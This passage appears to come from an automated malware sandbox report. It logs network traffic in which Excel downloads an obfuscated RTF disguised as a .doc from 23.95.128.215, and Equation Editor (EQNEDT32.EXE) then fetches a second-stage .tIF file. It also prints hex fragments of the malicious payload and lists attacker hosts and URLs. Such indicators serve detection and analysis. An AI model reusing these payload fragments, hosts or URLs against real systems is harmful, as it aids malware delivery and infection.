                                                                      Nov 27, 2024 17:56:26.132229090 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.132266045 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.132306099 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.136941910 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.137013912 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.137069941 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.137108088 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.140749931 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.140772104 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.140814066 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.145319939 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.145380020 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.145416021 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.145452976 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.150273085 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.150333881 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.150376081 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.150417089 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.154972076 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.155004025 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.155034065 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.155046940 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.159794092 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.159858942 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.159955978 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.159993887 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.164488077 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.164551020 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.164582968 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.164618015 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.169270992 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.169378042 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.169415951 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.169475079 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.174340963 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.174406052 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.174407005 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.174443007 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.179027081 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.179079056 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.179155111 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.179199934 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.183653116 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.183711052 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.183741093 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.183787107 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.188478947 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.188541889 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.188941002 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.188988924 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.193223953 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.193275928 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.193371058 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.193424940 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.197993040 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.198050022 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.198096991 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.198141098 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.202791929 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.202851057 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.202883959 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.202927113 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.207560062 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.207622051 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.207649946 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.207701921 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.212508917 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.212523937 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.212568045 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.216767073 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.216813087 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.216818094 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.216854095 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.221184969 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.221242905 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.221304893 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.221355915 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.225406885 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.225467920 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.225539923 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.225586891 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.229593039 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.229654074 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:26.229800940 CET804917423.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:26.229862928 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:27.185467958 CET4917480192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:27.499610901 CET804917323.95.128.215192.168.2.22
                                                                      Nov 27, 2024 17:56:27.499702930 CET4917380192.168.2.2223.95.128.215
                                                                      Nov 27, 2024 17:56:30.478987932 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:30.479046106 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:30.479110956 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:30.483264923 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:30.483280897 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.262799978 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.262890100 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.277034998 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.277066946 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.277410030 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.376684904 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.423338890 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.777937889 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.778614998 CET44349175193.30.119.205192.168.2.22
                                                                      Nov 27, 2024 17:56:32.778774023 CET49175443192.168.2.22193.30.119.205
                                                                      Nov 27, 2024 17:56:32.783600092 CET49175443192.168.2.22193.30.119.205

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 27, 2024 17:55:57.173398972 CET5456253192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:55:57.434621096 CET53545628.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:02.174067020 CET5291753192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:02.423719883 CET53529178.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:04.899614096 CET6275153192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:05.033914089 CET53627518.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:05.036307096 CET5789353192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:05.284099102 CET53578938.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:10.802742958 CET5482153192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:11.059844017 CET53548218.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:11.061187029 CET5471953192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:11.319096088 CET53547198.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:13.866019011 CET4988153192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:14.001075029 CET53498818.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:14.006047010 CET5499853192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:14.140970945 CET53549988.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:30.196841955 CET5278153192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:30.332910061 CET53527818.8.8.8192.168.2.22
                                                                      Nov 27, 2024 17:56:30.337702036 CET6392653192.168.2.228.8.8.8
                                                                      Nov 27, 2024 17:56:30.475198030 CET53639268.8.8.8192.168.2.22

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 27, 2024 17:55:57.173398972 CET192.168.2.228.8.8.80x38d0Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:02.174067020 CET192.168.2.228.8.8.80xb285Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:04.899614096 CET192.168.2.228.8.8.80x5ca9Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:05.036307096 CET192.168.2.228.8.8.80xe84Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:10.802742958 CET192.168.2.228.8.8.80x1100Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:11.061187029 CET192.168.2.228.8.8.80x2664Standard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:13.866019011 CET192.168.2.228.8.8.80xd97eStandard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:14.006047010 CET192.168.2.228.8.8.80x9c5bStandard query (0)ljg.clA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:30.196841955 CET192.168.2.228.8.8.80xcf24Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:30.337702036 CET192.168.2.228.8.8.80xe660Standard query (0)3105.filemail.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 27, 2024 17:55:57.434621096 CET8.8.8.8192.168.2.220x38d0No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:02.423719883 CET8.8.8.8192.168.2.220xb285No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:05.033914089 CET8.8.8.8192.168.2.220x5ca9No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:05.284099102 CET8.8.8.8192.168.2.220xe84No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:11.059844017 CET8.8.8.8192.168.2.220x1100No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:11.319096088 CET8.8.8.8192.168.2.220x2664No error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:14.001075029 CET8.8.8.8192.168.2.220xd97eNo error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:14.140970945 CET8.8.8.8192.168.2.220x9c5bNo error (0)ljg.cl152.231.102.107A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:30.332910061 CET8.8.8.8192.168.2.220xcf24No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:30.332910061 CET8.8.8.8192.168.2.220xcf24No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:30.475198030 CET8.8.8.8192.168.2.220xe660No error (0)3105.filemail.comip.3105.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 27, 2024 17:56:30.475198030 CET8.8.8.8192.168.2.220xe660No error (0)ip.3105.filemail.com193.30.119.205A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • ljg.cl
                                                                      • 3105.filemail.com
                                                                      • 23.95.128.215

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.224916623.95.128.215803208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 17:55:59.925378084 CET512OUTGET /43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc HTTP/1.1
                                                                      Accept: */*
                                                                      UA-CPU: AMD64
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 23.95.128.215
                                                                      Connection: Keep-Alive
                                                                      Nov 27, 2024 17:56:01.144768000 CET1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 27 Nov 2024 16:56:00 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Tue, 26 Nov 2024 16:17:10 GMT
                                                                      ETag: "3d07c-627d32e6398c8"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 249980
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/msword
                                                                      Data Raw: 7b 5c 72 74 66 31 0d 09 09 7b 5c 2a 5c 70 6e 61 69 75 64 36 30 33 39 38 30 38 33 34 20 5c 2e 7d 0d 7b 5c 34 39 37 39 31 30 31 39 37 30 28 b5 2a 32 25 3e 5e 35 35 2d 2f 5f 3f 37 2e 21 2b 25 3e 34 3b 32 b5 25 33 3b 2f 31 3f 40 7c 39 3b a7 37 3f 3b 5e 31 5b 3c 5b 3d 30 5e 25 2b 2a 3f 28 5f 3f 26 7c 33 31 23 2a 35 5f 37 3f 60 b0 40 3f 29 21 37 24 60 38 30 3f 25 3d 30 a7 37 34 28 2e 3f 27 29 25 30 b0 3f 2d 2f 27 3f 39 2c 23 33 2a 2d 25 29 2b 3a 37 25 7c 30 2e 5d 30 2d 3f 5b 3f 2c 3d 29 3f 2d 3e 3a 38 2f 29 5f 3c 35 60 28 40 2d 5e 3a 23 39 24 3f 3f 35 32 30 2a 5d 2b 2f 3f 38 7e 37 28 b5 25 35 37 40 2d 37 60 30 26 36 5e 21 3b 3c 60 23 38 3b 3f 2a 31 2f 24 33 b5 23 28 5e 37 3b 5f 3a 2f 40 3d 3f 3f 3f 32 2c 29 25 26 3e 2e 3a 5e 25 b5 2d b0 b0 21 25 2a 2f 32 3d 36 21 2a 34 2f 29 3b 3e 3e 29 25 2b 5e 3a 3f 5e 34 5d b5 5f 32 3e 38 40 28 37 38 24 25 3f 28 3a 38 30 3f 2b 38 3f 3a 32 7e 5d 3a 25 34 3c 40 35 39 60 2a 2e 2f 3d 5d 31 25 3a 2c 39 35 35 3f 26 37 32 3f 26 3f 2f 5d 23 34 37 3c 25 40 3f 31 3d 7e 5f b0 3f [TRUNCATED]
                                                                      Data Ascii: {\rtf1{\*\pnaiud603980834 \.}{\4979101970(*2%>^55-/_?7.!+%>4;2%3;/1?@|9;7?;^1[<[=0^%+*?(_?&|31#*5_7?`@?)!7$`80?%=074(.?')%0?-/'?9,#3*-%)+:7%|0.]0-?[?,=)?->:8/)_<5`(@-^:#9$??520*]+/?8~7(%57@-7`0&6^!;<`#8;?*1/$3#(^7;_:/@=???2,)%&>.:^%-!%*/2=6!*4/);>>)%+^:?^4]_2>8@(78$%?(:80?+8?:2~]:%4<@59`*./=]1%:,955?&72?&?/]#47<%@?1=~_?%:+:&49~#5!+@_??/!?<,$`8?)?[`(?|5/??4>=+8,%^[`-.`*?&^7|>*-`^9'?791?^`?'|2~6+:,)4??(<51-7^23|+0:7^&;`0(#&?^@'=1^?@?!%<>554*:~@+1;4$%:;,;_?0*%-+|[=%-?&&$?>=_]0>9,?,.(=@3??$;`9?[>?7,8&=5)]`=8_$~059|3.%&+#3:&;01??%#9<2#<4?8?=:/%%$4%/`(,5:;`-????~]03=?%180>(~8|?8'#??~,@;?~??`)!,`3]_!#3'`)%!~<?(3@^>7?&(*18*%0![0%?(<*?:.734_8@]$<@6;?1%0-@.<.!2|>?~?'08<5%.-241'&$$&6!'+)74-@;4%%`/-!.;%=0>=^$08?$(;4;%=0|'./3*!2??:7'#4??%6`)6&|7?._?5$;;[.;[$_#+(.49;?#<.+`>5+$?%.1%*??4@3<'(@248.??!$5??9@?'5-??@^<8('],[`@8?72*?1;;&`/:?*;)_44~~>-)[~9|6^7>[?%1783^+<)_
                                                                      Nov 27, 2024 17:56:01.144795895 CET1236INData Raw: 3f 24 3f 2f 2c 3d 5e 5b 5b 25 3f 7c 26 34 23 7c 2d 23 5e b5 31 3f 35 25 33 26 25 3f 28 3f 5e 3b 3a 3f 2d 31 23 3f 31 b0 24 2b 36 5d 25 23 30 3f b0 2c 36 3f 60 b5 28 24 38 32 2a b0 3f 5d 23 33 21 a7 5b 26 38 39 2c 34 60 3a 3a 40 39 3a 5d 5f 31 21
                                                                      Data Ascii: ?$?/,=^[[%?|&4#|-#^1?5%3&%?(?^;:?-1#?1$+6]%#0?,6?`($82*?]#3![&89,4`::@9:]_1!.%'_%%!&!$50%487>/=.^[|4#?(.77:;1&@,5*(=?:*'8_13/|~5<)?_59?5)/34^/)=_+??%*002;?==8;?1'2(7~.?,`9=;_-#,:5(??^0~6`8#?=<%#/[7`3%&/:[]2,++)%[.>?[-'4*?0?@6%?
                                                                      Nov 27, 2024 17:56:01.144807100 CET1236INData Raw: 2d 37 27 29 26 2b 7e 2d 21 2d b5 26 60 3e 3f 3c 7c 5f 34 23 30 3f 40 3f 3f 3f b5 3f 5b 3a 3f 2a 2a b0 7e 3f 39 39 3f 28 38 b0 3f 30 3c 25 7c 3f 27 30 60 28 35 34 3c 3f 5e b0 2f 2d 27 5f 2a 7c 3f 3f 3a 31 60 38 27 5b 7e 33 b5 3e 5f 3c 27 25 23 5f
                                                                      Data Ascii: -7')&+~-!-&`>?<|_4#0?@????[:?**~?99?(8?0<%|?'0`(54<?^/-'_*|??:1`8'[~3>_<'%#_=/=%0++58$#+*8?0??34/6#*/^=^@=~,_3#^?!_3!;-#1*&@=(_!-6*2^<#?|%]3,_?&5'?[?;3!]@&7949??](2'8&8%6,?1=?3??<?[7*87>51%%&3<_5?'%`?%>*,,)_&;3#:_@?8)_>?!+'?;!~.#(+
                                                                      Nov 27, 2024 17:56:01.144953012 CET672INData Raw: 2e 40 28 b0 3d 7e 60 30 29 3d 27 28 3b 25 25 37 40 31 3f 7e 2b 25 7c b0 b5 24 3f 7e 30 3f 21 30 7c 2b 40 28 3f 3d 2a 2c 28 23 33 23 33 34 34 30 37 7e 3e 25 31 2d 34 a7 5b 33 35 30 a7 24 2a a7 28 38 3c 5f 28 3a 2b 3b 60 60 38 2c 26 3f 2e 34 a7 40
                                                                      Data Ascii: .@(=~`0)='(;%%7@1?~+%|$?~0?!0|+@(?=*,(#3#34407~>%1-4[350$*(8<_(:+;``8,&?.4@[0!9'];?||4'31;++136$!%?^;&.?`((!?-`81=%%+?38?-=1>]^]5=0@?8?/#4/'$?[|/1(1?&*9?:%??~<(~`~<$32#7?|>87`?:0'+|6[|_/^7&4[3`+&'6)!@|?(1/40~_?2?2!2.|'*6^]]*5
                                                                      Nov 27, 2024 17:56:01.144968033 CET1236INData Raw: b5 2a 2d 3e a7 2c 37 33 34 60 7e 3b 37 26 b5 37 5b a7 28 28 25 b5 21 3f 7e 3f a7 40 2c 3a 38 37 5b 21 27 40 3b a7 38 40 2b 5b 28 28 2b 3b 38 23 2c 37 2a 7c 39 2c 39 26 2e 25 2a 3f 25 27 3f 32 35 3f 2a b5 23 3f 3f 3b 34 5e 3a 3e 29 7c 5b 3f 3b 2e
                                                                      Data Ascii: *->,734`~;7&7[((%!?~?@,:87[!'@;8@+[((+;8#,7*|9,9&.%*?%'?25?*#??;4^:>)|[?;.)^]89;7:'~*7%?;=8^:4(5`%~@4`-0@_???=2^,/:,|;+)!@(,?&;6/.)4+83^;?`67!(%$#499,.^3^^^%]@`->430`30]895:++,51+<:?3928,:$2*3~%#4|>$7|_?>=9)?%?/)2|52|,4,<?>5%<;>
                                                                      Nov 27, 2024 17:56:01.144984007 CET1236INData Raw: 5c 6c 65 76 65 6c 74 65 78 74 35 34 30 34 38 32 38 31 34 20 5c 62 69 6e 30 30 30 30 30 5c 39 32 30 32 34 35 31 36 35 34 31 34 33 30 34 39 30 37 7d 0d 5c 72 65 76 62 61 72 37 34 33 35 37 33 35 39 33 32 39 37 33 5c 66 62 69 61 73 35 39 35 38 36 33
                                                                      Data Ascii: \leveltext540482814 \bin00000\920245165414304907}\revbar7435735932973\fbias59586377\'
                                                                      Nov 27, 2024 17:56:01.144995928 CET1236INData Raw: 20 09 20 39 37 0a 0a 0d 0d 0d 0a 0d 0d 0a 0d 0d 0d 0a 0d 0a 0a 0d 0d 0d 0d 0a 0d 0d 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0d 0d 0a 34 0a 0a 0d 0d 0d 0a 0d 0a 0d 0a 0a 0d 0d 0a 0d 0d 0a 0a 0d 0a 0a 0a 0d 0a 0a 0d 0a 0a 0d 0a 0d 0d 0a 0d 0d 0a 34 09 20 20
                                                                      Data Ascii: 9744 754
                                                                      Nov 27, 2024 17:56:01.145009041 CET1236INData Raw: 20 09 09 20 09 20 09 20 09 20 30 09 09 20 09 20 09 20 09 09 20 09 20 20 20 09 09 09 09 20 09 09 09 09 20 09 20 09 09 09 09 20 09 20 09 20 09 09 09 09 20 09 09 09 20 20 09 20 09 20 20 20 20 09 20 09 20 09 09 20 20 20 20 20 09 20 09 09 20 09 09 20
                                                                      Data Ascii: 0 00 00000
                                                                      Nov 27, 2024 17:56:01.145240068 CET1236INData Raw: 20 09 20 09 20 61 65 0a 0d 0d 0d 0d 0d 0a 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0d 0d 0d 0a 0a 0d 0a 31 30 30 30 30 30 30 30 0a 0d 0d 0d 0d 0d 0a 0a 0d 0a 0d 0d 0d 0a 0d 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0d 0d
                                                                      Data Ascii: ae100000000000000
                                                                      Nov 27, 2024 17:56:01.145252943 CET1236INData Raw: 09 20 20 20 09 09 09 09 20 09 20 20 09 20 20 20 20 20 20 20 20 20 09 20 09 09 09 20 09 20 09 09 09 20 20 09 20 20 20 20 09 09 09 09 20 09 20 20 20 20 09 09 09 09 20 20 09 20 09 09 20 09 20 36 09 09 20 20 20 20 20 09 20 09 20 20 09 20 09 09 20 20
                                                                      Data Ascii: 6 00 0
                                                                      Nov 27, 2024 17:56:01.265113115 CET1236INData Raw: 20 20 20 09 09 09 20 20 09 20 09 20 20 20 20 20 20 20 20 09 09 09 20 09 09 09 09 20 20 09 20 09 09 20 09 20 30 0d 0a 0d 0d 0d 0a 0a 0d 0d 0a 0d 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 0d 0a 0a 0d 0a 30 0d 0a 0a 0a 0a 0a 0a 0d
                                                                      Data Ascii: 0010 000


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.224917323.95.128.215803472C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 17:56:21.332226992 CET325OUTHEAD /43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc HTTP/1.1
                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                      Host: 23.95.128.215
                                                                      Content-Length: 0
                                                                      Connection: Keep-Alive
                                                                      Nov 27, 2024 17:56:22.510947943 CET323INHTTP/1.1 200 OK
                                                                      Date: Wed, 27 Nov 2024 16:56:22 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Tue, 26 Nov 2024 16:17:10 GMT
                                                                      ETag: "3d07c-627d32e6398c8"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 249980
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/msword


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.224917423.95.128.215803812C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 27, 2024 17:56:24.232726097 CET362OUTGET /43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                      Host: 23.95.128.215
                                                                      Connection: Keep-Alive
                                                                      Nov 27, 2024 17:56:25.439997911 CET1236INHTTP/1.1 200 OK
                                                                      Date: Wed, 27 Nov 2024 16:56:25 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                      Last-Modified: Tue, 26 Nov 2024 16:28:30 GMT
                                                                      ETag: "28446-627d356f81e23"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 164934
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Content-Type: image/tiff
